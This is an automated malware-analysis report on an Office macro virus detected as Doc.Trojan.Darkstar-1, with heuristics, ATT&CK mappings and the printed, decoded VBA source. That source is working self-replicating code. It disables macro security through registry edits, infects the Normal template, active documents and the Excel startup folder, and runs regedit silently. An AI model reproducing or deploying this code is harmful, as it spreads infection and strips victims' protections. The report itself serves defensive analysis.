MALICIOUS
320
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
T1566.001 Spearphishing Attachment
The sample contains VBA macros that attempt to lower Excel's security settings and inject code into the Normal template and the active document. The 'Document_Open' and 'Document_Close' subroutines, along with the use of 'CreateObject("Excel.Application")', suggest an attempt to establish persistence or download and execute a second-stage payload. The ClamAV detection name 'Doc.Trojan.Darkstar-1' further supports its malicious nature.
Heuristics 6
-
ClamAV: Doc.Trojan.Darkstar-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Darkstar-1
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
GetObject call high OLE_VBA_GETOBJGetObject call
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4629 bytes |
SHA-256: 3d5062d4974dc58faed2653f1440733fa651e963ee962385c37e40474d273c03 |
|||
|
Detection
ClamAV:
Doc.Trojan.Darkstar-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub Document_Close()
'Darkstar
On Error Resume Next
Options.SaveNormalPrompt = False
Options.SendMailAttach = True
Options.ConfirmConversions = False
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Excel\Security", "Level") = 1
Else
CommandBars("Tools").Controls("Macro").Enabled = False
Options.VirusProtection = False
End If
Set Nrmal = NormalTemplate.VBProject.VBComponents(1).codemodule
Set aktiv = ActiveDocument.VBProject.VBComponents(1).codemodule
If Nrmal.Lines(2, 1) <> "'Darkstar" Then
Nrmal.DeleteLines 1, Nrmal.CountOfLines
Nrmal.InsertLines 2, aktiv.Lines(2, aktiv.CountOfLines)
Nrmal.InsertLines 1, "Sub Document_Open()"
Nrmal.Replaceline 42, "Sub Workbook_Deactivate"
End If
If aktiv.Lines(2, 1) <> "'Darkstar" Then
aktiv.DeleteLines 1, aktiv.CountOfLines
aktiv.InsertLines 2, Nrmal.Lines(2, Nrmal.CountOfLines)
aktiv.InsertLines 1, "Sub Document_Close()"
aktiv.Replaceline 42, "Sub Workbook_Activate()"
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
End If
Set xlApp = CreateObject("Excel.Application")
If UCase(Dir(xlApp.Application.StartupPath + "\Book1.")) <> UCase("BOOK1") Then
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel", "Options6") = ""
Set Book1Obj = xlApp.Workbooks.Add
Book1Obj.VBProject.VBComponents.Item("ThisWorkbook").codemodule.InsertLines 1, Nrmal.Lines(1, Nrmal.CountOfLines)
Book1Obj.VBProject.VBComponents.Item("ThisWorkbook").codemodule.Replaceline 42, "Sub Workbook_Deactivate()"
Book1Obj.SaveAs xlApp.Application.StartupPath & "\Book1."
Book1Obj.Close
xlApp.Quit
End If
End Sub
Sub Workbook_Deactivate()
On Error Resume Next
Set aw = ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").codemodule
Set tw = ThisWorkbook.VBProject.VBComponents("ThisWorkbook").codemodule
tw.Replaceline 42, "Sub Workbook_Deactivate"
If aw.Lines(2, 1) <> "'Darkstar" Then
aw.DeleteLines 1, aw.CountOfLines
aw.InsertLines 1, tw.Lines(1, tw.CountOfLines)
End If
If UCase(Dir(Application.StartupPath + "\Book1.")) <> "BOOK1" Then
ActiveWorkbook.SaveAs Excel.Application.StartupPath & "\Book1."
Open "c:\Dstar.reg" For Output As 1
Print #1, "REGEDIT4"
Print #1, "[HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel]"
Print #1, """Options6""=dword:00000000"
Print #1, "[HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Excel\Security]"
Print #1, """Level""=dword:00000001"
Print #1, "[HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security]"
Print #1, """Level""=dword:00000001"
Close 1
Shell "regedit /s c:\Dstar.reg", vbHide
Set WordObj = GetObject(, "Word.Application")
If WordObj = "" Then
Set WordObj = CreateObject("Word.Application")
crossQuit = True
End If
Set Nrmal = WordObj.NormalTemplate.VBProject.VBComponents(1).codemodule
WordObj.Options.SaveNormalPrompt = False
Nrmal.DeleteLines 1, Nrmal.CountOfLines
Nrmal.InsertLines 1, tw.Lines(1, tw.CountOfLines)
Nrmal.Replaceline 1, "Sub Document_Open"
Nrmal.Save
If crossQuit = True Then WordObj.Quit
End If
'And she will come from India with a gun at her side,
'Or she will come from Argentina
'with her cemetery eyes that say
'oh, how my Dark Star will rise
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.